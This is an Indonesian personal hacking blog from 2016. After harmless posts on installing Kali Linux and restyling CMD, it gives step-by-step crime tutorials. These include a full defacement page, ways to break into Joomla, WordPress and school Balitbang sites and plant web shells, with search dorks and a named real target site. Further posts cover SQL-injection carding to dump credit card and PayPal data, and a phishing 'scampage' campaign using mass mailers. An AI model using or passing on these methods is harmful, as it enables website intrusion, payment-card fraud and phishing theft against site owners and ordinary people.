Senin, 25 Januari 2016

Download ISO Kali Linux

contoh gambar Kali Linux

Kagak sekolah njer saya :D Tapi mampir di wifi.id :D
Alahh itu gak masalah udah biasa bagi saya gak sekolah tu :D
Banyak hacker yg makai IOS Linux contohnya Kali Linux, saya yakin kalian pasti juga mau nyoba make Linux :D
Ya udahlah, nih yg mau instal linux tinggal download ISO Kali Linux 32 bit atau 64 bit :D saya udah siaphan linknya tinggal kalian download aja :D :*
saya cuman memudahkan orang" download Kali Linux, emang saya akui saya agak sulit downloadnya :D

https://www.kali.org/downloads/

Yaudah tuh tinggal nunggu selesai downloadnya aja :D
yg masih bingung bisah chat saya https://www.facebook.com/nanangcekrek

Kamis, 21 Januari 2016

Cara Membuat CMD Transparan

Assalamualikum... ( Jawab Cuk )

Pulang sekolah, mampir wifi id terus enaknya ngepos dulu biar greget, kali ini saya mau share cara merubah tampilan CMD[Command Prompt] seprti console pada linux.

Sering kali kita bosan dengan tampilan CMD yang item dan gitu-gitu aja, biar gak bosen saya akan share cara merubah tampilan CMD seprti console linux. Jadi nanti tampilan CMD akan mirip seperti dengan Console pada LINUX Backtrack.
Selain CMD menjadi Transparan, sobat juga dapat mengatur pavicon, mengatur warna text dan lain-lain.

yg bingung bisah chat saya https://facebook.com/nanangcekrek
ini contoh tampilan CMD saya:

gimana? keren gak? :D

Langsung saja ke cara pembuatannya

- Download dulu aplikasi : Klik Disini

- Jika selesai lakukan ekstrak file kemudian rename file yang bernama console.exe menjadi cmd2.exe

- Selanjutnya copy semua isi file dalam folder console2 kemudian paste pada C:/windows/system32
(hal ini bertujuan untuk mempermudah pemanggilan aplikasi pada menu run seperti halnya pada saat pemanggilan perintah cmd bawaan windows)

- Untuk mengujicoba pemanggilan aplikasi tekan tombol kombinasi Windows + R atau masuk ke menu RUN kemudian ketik cmd2

- Setelah layar cmd2 tampil, lakukan pengaturan dengan cara klik pada menu view-edit-setting kemudian masuk pada tab appearance-more, pada layar sebelah kanan berikan centang pada Windows transparency dan pilih alpha,

- kemudian atur active windows sesuai keinginan anda.

Cara Menginstal Kali Linux Melalui Virtual Box

Banyak yg belum tau cara menginstal kali linux, tp saya hanya bisah menginstal make virtual box :D maklum masih newbie :D
Yg belum paham silahkan tanya saya https://facebook.com/nanangcekrek

Kali Linux merupakan sistem operasi yang digunakan untuk penetration testing.Kali Linux berbasis Debian GNU/Linux Distribution dan dilengkapi dengan berbagai tool untuk keperluan penetration testing. Sedangkan Virtual Box adalah mesin atau komputer virtual yang dikembangkan oleh Oracle. Dengan menggunakan VirtualBox, berarti anda bisa menggunakan sistem operasi termasuk Kali Linux tanpa harus meng-instal-nya dalam hard disk. Cara instal Kali Linux dalam VirtualBox adalah sebagai berikut:

1. Download Kali Linux yang sesuai dengan platform komputer anda dan VirtualBox.

2. Setelah instal Virtual Box, buka dan klik "New".

3. Berikan nama sesuai keinginan anda, dalam hal ini saya beri nama "Kali Linux", dengan Type = Linux, dan Version = Ubuntu (64 bit), dan klik "Next".

4. Selanjutnya, tentukan besar Memory yang anda ingin alokasikan untuk Kali Linux dalam VirtualBox, Dalam hal ini, saya pilih default=512 MB, dan klik "Next".

5. Selanjutnya pilih "Create a virtual hard drive now", dan klik "Create".

6. Selanjutnya, biarkan pilihan default, yaitu "VDI (VirtualBox Disk Image)" dan klik "Next".

7. Selanjutnya, biarkan pilihan default, yaitu "Dynamically allocated' dan klik "Next".

8. Selanjutnya, beri nama Virtual Drive dan tentukan besarnya, dalam hal ini saya alokasikan 16 GB, dan klik "Create".

9. Setelah melakukan pengaturan di atas, klik "Settings".

10. Selanjutnya klik "Storage". Kemudian klik "Empty" pada "Controller: IDE".

11. Selanjutnya, klik icon DVD pada bagian "Attributes". Kemudian klik "Choose a virtual CD/DVD disk file".

12. Selanjutnya, pilih file ISO Kali Linux yang telah anda download dan klik "Open". Kemudian klik "OK".

13. Selanjutnya klik "Start".

14. Selanjutnya, tekan "Enter" dengan highlight pada "Live (amd64)" untuk melakukan boot. Tapi anda juga bisa bisa "Graphical install" jika anda mau langsung instal permanen.

15. Setelah anda berada dalam Graphical Interface Kali Linux dan bermaksud untuk instal Kali Linux, klik "Applications" > "System Tools" > "Install Kali Linux".

Cara Membuat Script Deface Keren

Okee, kali ini saya akan mengajari membuat script Deface :D
Sebenarnya Membuat script Deface sangatlah mudah, kita cuma harus menghafal kode html dan java script :D
okee langsung saja ke TKP :D
yg bingung silahkan bisah tanya sama saya https://www.facebook.com/nanangcekrek

yg mau copas silahkan saja :) Tinggal kalian edit sesuka kalian :D

Contoh Gambar Script Deface

<html>
<head>
<title>[[ Hacked By ./Detected_Attacker ]] !!! Why??</title>
<body bgcolor=black>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<style type="text/css">
h1 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}

h2 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}

h3 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}

h4 {color: #FF0000;font-size: 20px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}

.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.jokitz1{
    text-align : center;
    }
.jokitz2{
    text-align : center;
    font-family : Courier;
    }
</style>
<script type="text/javascript">



</script>



<script type="text/javascript" language="javascript">



</script>
<link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
</head>
<center>

<br>

<h1>Hacked By ./Detected_Attacker !!!</h1>

<div id="matrix" class="auto-style8">--Team CyberMind Hackers--</div>
<br>
</center>

<div id="matrix" class="auto-style8">--Thanks To All Team Defacer Indonesia--</div>
<br>
</center>
<center>
<style>

<hr width="550px" style='color:red;'>

<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>

<span style='font: 15px Lucida Handwriting;size:15px;color:cyan;text-shadow: 0px 0px 50px;'><strong>
<style type="text/css">
<span style='font: 100px>
body{
font-family: Trebuchet MS, Lucida Sans Unicode, Arial, sans-serif;
margin-top:0px;
   background-repeat:no-repeat;
padding-top:26px;
}
    #myContent, #myContent blink{
        width:0%px;
        height:0%px;
        background:black;
        color: #00FFFF;
        font-family:IceLand;
        font-size:20px;
    }
    blink{
        display:inline;
    }
    </style><br />
    <script type="text/javascript">
var charIndex = -1;
    var stringLength = 0;
    var inputText;
    function writeContent(init){
     if(init){
      inputText = document.getElementById('contentToWrite').innerHTML;
     }
        if(charIndex==-1){
            charIndex = 0;
            stringLength = inputText.length;
        }
        var initString = document.getElementById('myContent').innerHTML;
initString = initString.replace(/<SPAN.*$/gi,"");

        var theChar = inputText.charAt(charIndex);
        var nextFourChars = inputText.substr(charIndex,4);
        if(nextFourChars=='<br>' || nextFourChars=='<br>'){
         theChar = '<br>';
         charIndex+=3;
        }
        initString = initString + theChar + "<span id='blink'>_</SPAN>";
        document.getElementById('myContent').innerHTML = initString;

        charIndex = charIndex/1 +1;
if(charIndex%2==1){
             document.getElementById('blink').style.display='font: 100px';
        }else{
             document.getElementById('blink').style.display='inline';
        }

        if(charIndex<=stringLength){
            setTimeout('writeContent(false)',100);
        }else{
         blinkSpan();
        }
    }
        var currentStyle = 'inline';
    function blinkSpan(){
     if(currentStyle=='inline'){
      currentStyle='none';
     }else{
      currentStyle='inline';
     }
     document.getElementById('blink').style.display = currentStyle;
     setTimeout('blinkSpan()',9999999);

    }
    </script>
    <EMBED SRC="http://sarbaz-faz.persiangig.com/Hack/Troy%20.mp3.swf" AUTOSTART=TRUE LOOP=TRUE WIDTH=0 HEIGHT=0 ALIGN="CENTER"></EMBED>
</html>

Itu script Deface yg menarik menurut saya :D karna tampilanya simple dan bagus :D
okee sekian terima kasih :)

Selasa, 19 Januari 2016

Cara Deface Web Dengan Exploit Com Fabrik

Cara Deface Web Dengan Exploit Com Fabrik
Nama Deface Sekarang Aneh" :D Com_Pabrik :v Mungkin Pabrik Kali ya :D.
Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut. Ok simak tutorial berikut.

1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik

2. Akan ada banyak web, anda buka terserah yang mana

3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini

5. Klik "pilih file" untuk memilih shell, dan klik "Import CSV untuk mengupload

6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php

7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.

Selamat mencoba

Cara deface web dengan metode Com_User

Cara deface web dengan metode Com_User/Exploit Joomla

Com_User adalah Teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di seluruh indonesia. Com_User / Teknik Exploit joomla ini bisa di gunakan untuk web yang menggunakan joomla versi 1.6/ 1.7.3/ 2.5.

Bahan-Bahan

1. Exploit Joomla || Download disini ||

Langkah-Langkah

1. Cari web target di google .

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

(atau)

intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

(atau)

intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:

*site: boleh diganti dengan com/ ca/ it/ za/ id/ ru dll (terserah anda)

intitle berarti, kata yang terkandung dalam judul sebuah Web.

intext berarti, kata yang terkandung didalam web tersebut.

site berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangin sendiri agar mendapat hasil yang lebih maksimal.

2. Open link in new tab, semua web yang muncul di hasil pencarian google. karena tidak semua web bisa.

3. Cari web yang vuln.

Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

4. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.aquafiltersrbija.rs. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi hhttp://www.aquafiltersrbija.rs/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.

6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombolctrl+u / klik kanan -> Lihat sumber laman

7. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini.

8. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak yang di paling bawah. Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.aquafiltersrbija.rs/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username nya (terserah kamu )

*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://www.aquafiltersrbija.rs maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.aquafiltersrbija.rs/administrator/

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.

3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Paling sering GAGAL pada nomor 2

sekian, terimakasih

Created By :./Detected_Attacker

Tutorial Deface Metode WP-INSTAL

By: JupLe Attacker a.k.a Nanang

Saya Akan Membagikan tutor deface dengan metode wp-instal :*

Langsung aja Ndes !

1. Pertama pergi ke SINI

2. Daftar account di shodan atau bisa juga login menggunakan account sosial media yang kalian miliki

3. Setelah selesai login searching target wordpress dengan dork : "/wp-admin/install.php"

4. Cari target yang bertuliskan "HTTP/1.1 302 Found"

5. Klik target lalu jika target vuln/bisa di eksekusi akan muncul seperti ini :

Dan apabila kalo target tidak vuln akan muncul ERROR seperti ini :

6. Klik Continue, kemudian isi data-datanya sesuai kalian

7. Kalo sudah selesai tinggal klik Install WordPress, nanti kalo muncul seperti ini berarti berhasil !

8. Nah misalkan udah berhasil tinggal di eksekusi dah entah tebas index atau upload shell

Deface Dengan CMS Balitbang

Deface Dengan CMS Balitbang

Hay Ketemu Lagi Bersama Saya :D Mumpung Lagi Di @Wifi.id Buat Postingan Ajalah :D
Yakk Seperti yang kita ketahui CMS itu adalah Content Management System, dan terdiri dari berbagai macam jenis seperti : Joomla!, WordPress, Drupal, dsb.Tapi ternyata di Indonesia ini juga ada tim Balitbang yang juga membuat CMS tapi khusus diperuntukkan sekolah-sekolah mulai tingkat SD sampai SMA/SMK. (Tragis Ya)

Kelebihan dari CMS Balitbang ini dari halaman adminnya yang mudah dioperasikan untuk orang yang awam terhadap dunia website sekalipun ( karena itu memang inti dari CMS ).Dan fitur-fitur default ( bawaan ) dari CMS Balitbang bisa dibilang sudah lengkap untuk keperluan seperti website sekolah.

Sekarang Saya akan mengajarkan cara Deface CMS Balitbang dengan cara Inspect Element, cara ini tidak terlalu rumit. Hanya dibutuhkan Copy Paste dan Inspect Element saja.
Dork : inurl:member/daftar.php ( Kembangin Sendiri )
1). Masukan Dork di pencarian Google

2). Pilih salah satu website yang ingin di deface lalu exploit " /member/daftar.php "

3). Klik kanan di kolom " Jenis Member ", kemudian pilih Inspect Element.

4). Ubah <option value="Tamu">Tamu</option> menjadi <option value="Guru">Tamu</option>

5). Isi semua pendaftaran, dan gunakan email yang vaild.

6). Cek email masuk yang telah didaftarkan tadi, lalu konfirmasi validasi.

7). Klik lanjutkan, dan Kita akan dibawa ke halaman administrasi. Login menggunakan Username dan Password yang telah didaftarkan tadi.

Cara tanam Shell :

1). Pada halaman admin, ada menu yang bertuliskan materi/belajar. Pilih menu materi atau belajar kemudian klik " Tambahkan Materi Ajar "

2). Isi materi terserah saja, isi file dengan shell Kita.

3). Setelah berhasil, klik " Download Materi Ajar "

4). Lalu klik file yang tadi Kita buat, kemudian klik " Download File "

Apabila muncul tampilan Shell berarti berhasil, apabila tampilan Shell tidak muncul ' Mungkin Lu Kurang Tamvan
Okee Sekian Dulu Terima Kasih :D Semoga Membantu :D

Tutor Cara Carding Dan Scaming

Hay Semua Mungkin Masih Pada Gak Kenal Sama Saya Tentunya :D Iya Saya Nanang Orang Tamvan Tentunya :D Udah Gak Usah Basa Basi Langsung Sikat Ajah :D
Jika Kalian Ingin Bertanya Silahkan Kunjungi Facebook Saya :D https://www.facebook.com/nanangcekrek Fotoku Jangan Dilihatin Terus yaa :D Apa Lagi Diambil :D Jangan Kalian Santet :V
1. Alat Dan Bahan
- Internet
- Kopi Panas
- Rokok Sampoerna Mild :D (Biar Greget)
- Dan Tentunya Wajah Tamvan :D

Di Download Aja Ya Ndes... :D:D:D

ALat-ALat Carding:

1.Tutorial Carding Disini

2.Havij Portable Disini

3.Simple Scan Dork Disini

4.Grenox Dork Scanner Disini

5.SQLI-DB Disini

6. Dork 1 Klik Disini Dork 2 Disini Dork 3 Disini Dork 4 Disini

7.Methode Order Western Union Disini

8.Methode All Site Disini

9.SQL MAP Disini

10.Phyton Untuk Support SQL MAP Disini

Untuk Mencari CC/PP Gunakan Salah Satu Tools...

Pilih Diantara Tools yang mungkin anda suka atau anda sudah pahami cara menggunakannya...

Pilih Tool Antara Havij,SQL MAP,Atau SQL Dumper...

Untuk Mencari Web vuln Pake tools diantara SQLi-DB atau Gr3nox Dork Scanner..

Sebelumnnya Saya Sudah memposting cara menggunakan SQLi-DB..

Untuk DOrk Saya Sudah Menyiapkan Bayak Diatas Dan Anda Tinggal Download Dan Langsung Praktekkan..

Jika Anda Ingin Mencheck CC/PP anda Yang Sudah Anda Dapat Dari Hasil Carding Anda Bisa Menchecknya Di Site dibawah ini..

Tetapi Anda Harus Membeli Invite Code Dan Juga Crenya...

Checker CC:

1.Ipro.Club Disini

2.SayaPro Disini

Checker PP:

Nonong Crew Disini

Untuk Anda Yang Mendapatkan Paypal terlebih Dahulu Anda Harus MengHash Kode Yang Anda Dapat dan Menyusunnya Sesuai Email..

Untuk Hash Type MD5 Disini

Untuk Hash Type SHA1 Disini

Semoga Sukses :D :D :D Jangan Lupa Kalau Udah Berhasil Transfer Juga :D

2. Cara Mencari WebVuln

Cara Mencari Webvuln Untuk Carding Menggunakan SQLI-DB

Turor Dari Saya Ini Bukan Seperti Turtor Yang Di Berikan Orang yang hanya begitu singkat saja atau Sekilas...

saya akan mengajarkan anda cara mencari webvuln untuk Carding...

CHECK IT OUT

Pertama Download Disini SQLI-DB

Tutorial:
1.Cari Dork Anda Yang Isi Dorknya Ada Webvuln..

Untuk Download Dorknya Disini Dan Disini

2.Setting SQLI-DBnya

Misalnya:

Search Engine:GOOGLE

Remove Duplicate:YES

Deep Scan:YES

Proxy:YES

Total Result:(Terserah Loe Ngisi Berapa)

3.Masukkan Dork Tersebut Ke dalam Kolom Search Di SQLI-DB

4.Klik Scan(Klik Gambar LUP)

5.Klik Vulnerable Untuk Melihat Site Yang Vuln

6.Selesai Tinggal Scan Di Havij Hapus %27 yang berada di akhir sitenya..

3. SCAN

Bahan - Bahan :

1. Havij 1.16 Pro ( comot DISINI )

2.Web Vuln

Oke langsung aja caranya :

1. Siapkan Tool Havij 1.16 Pro
2. Lu cari dah Web OLshop yang vuln dengan menggunakan dork yang disediakan

Untuk mencari WEB yang Vuln, Bisa pakai Gr3EnoX .. Caranya: Pertama, Pada Kolom"DORK" pastekan Dork yang ingin di Scan.. Kedua, klik "SEARCH" ..Tunggu hingga proses scanning selesai.. Web yang TIDAK VULN , ada di kolom sebelah KIRI .. Dan Web yang VULN, akan muncul di kolom sebelah KANAN

ATAU , BISA JUGA SECARA MANUAL . SIMAK NIH...

NB: Untuk mencari web OLshop yang vuln, kita tinggal menambahkan tanda ' (kutip 1) di belakang URL, Misalkan gue mau cari web vuln dengan dork "inurl:merchandise/index.php?cat=" lu paste aja ntu dork di mbah gugel.. nnti akan banyak web OLshop.. Lu cek satu per satu dengan menambahkan tanda kutip tadi di setiap belakang URLnya..

Nah.. tuh, udah gue tambahin tanda kutip di belakang Urlnya.. jika muncul seperti ini

Berarti Web itu Vuln ..

3. Gue ambil target http://www.pikerpress.com/merchandise/index.php?cat=book

4. Klik "analyze" .. kalo udah ada tulisan "CurrentDB=" berarti proses analyze sudah selesai.. kalo sudah selesai, Klik kolom "Tables" diatas.. akan muncul gambar seperti ini

5. Ceklis kotaknya, lalu klik "Get Tables", jika sudah, tampilan nya jadi benini

6. untuk mencari data-data Credit Card, biasanya terdapat pada tables "Users" , "Consumers" atau yang lain nya.. sekarang, kita coba dari tables "Users".. ceklis kolom kecil disebelah tulisan "Users", lalu klik "Get Columns" .. maka akan seperti ini

7. Nahh, itu ada informasi ID, Username, Password.. Disini kita apes, gaada ColumnsCreditCard :'v kalo kalian beruntung, pasti terdapat informasi Creditcard, Paypal, dll.. tapi kita coba dulu ID , Username, Password.. cara mendapatkan data nya, kita ceklis Id, Username, Password, Lalu Klik "Get Data" .. kali ini gue mau liat semuanya, maka yang diceklis adalah (liat gambar dibawah)

8. Kolom yang disebelah kanan Itu adalah kolom untuk menampilkan data-data yang kita inginkan (gue cuma dapet 1 -_- ) .. kalo kita mau lihat semua datanya, klik "Save DATA" dan formatnya adalah HTML.. Gimana cara buka file yang formatnya HTML ? gampang bro.. lu tinggal Klik Kanan >> Open With >> Google Chrome (ini gak harus google chrome juga sih .. pokoknya openwith browser yang yg udah terinstall)

Free Dork VVIP , CLICK HERE
udah lama saya juga tidak memPosting di blog... Soalnya Blogku Yg Lama Lupa Password :D Masih Ingat Gak Blogku Yg Lama :D > nanangmyblog.blogspot.com

Kali ini saya akan MemPosting bagaimana cara Membuat SCAMPAGE untuk menyedot Paypal dan Credit Cardnya Sekaligus... Okee :D

Cara SCAMING

ALAT DAN BAHAN:

►CPANELyang SERVERnya tidak DOWN
►SCRIPT ada Di Bawah
►Mailer/SMTP
►Letter
►MaiList (Dump Sendiri)

Saya membuat server tidak down supaya RESULTnya Nanti Masuk Ke Email Anda....

SCRIPT SCAMPAGE 1 DOWNLOAD DISINI

SCRIPT SCAMPAGE 2 DOWNLOAD DISINI

SCRIPT SCAMPAGE 3DOWNLOAD DISINI

LETTER PAYPAL DOWNLOAD DISINI

MAILER 1 DISINI Password Mailer: Gujjar MAILER 2 DISINI

Tentunya Anda Harus Memiliki Cpanel Dan juga DOMAIN Gratisan Bisa Tapi saya sarankan domain Yang Premium Misalnya Domain .com,net,org

Terserah Lu dah... :D

1.Upload Script Scampagenya Ke Cpanel Lalu EXTRACT

2.Isi Email anda di Folder CMD>__YourEMail__.php

3.Test Lihat Scampage anda Lihat Di Domain Anda

4.Jika Result Masuk Nahh... Tinggal Nebar Dah....

Cara Menyebar:

1.Buka Mailer Dan Pastinya Anda Sudah Mendownload Letternya

2.Ganti Link http://adf.ly/1KUAAV dengan Link Scampage /domain scampage anda Caranya CTRL+F tentunya kan karena itu letter berbentuk HTML bukanya dengan notepad dah...

3.Copy Semua Isi Letternya Masukkan Ke Letter di Mailernya...

4.Saya Lupa Tentunya anda Harus Memiliki MAILIST

Cara Mencari MAILIST dengan Cara Mendumpnya dengan HAVIJ atau SQLI-DUMPER

Mailist itu adalah daftar Email Yang banyak Atau Bejibun :v :v :v

Kalau Sudah Tinggal Klik Send Message Dah...

Dan Tinggal Tunggu RESULTnya masukk....

Pastikan Letternya Masuk Email..

Jika gagal Anda Terpaksa Membeli SMTP untuk Send Letter Dengan EMAIL SENDER DELUXE Atau Kalian Kurang Tamvan Kaya Saya :D
Nanti Saya Akan MemPosting Cara Memakai EMail Sender Deluxe...
Silahkan Tinggalkan Komentarnya Atau Hubungi Langsung Facebook Saya https://www.facebook.com/nanangcekrek
Okee :D Sekian Dan Trimakasih :D :*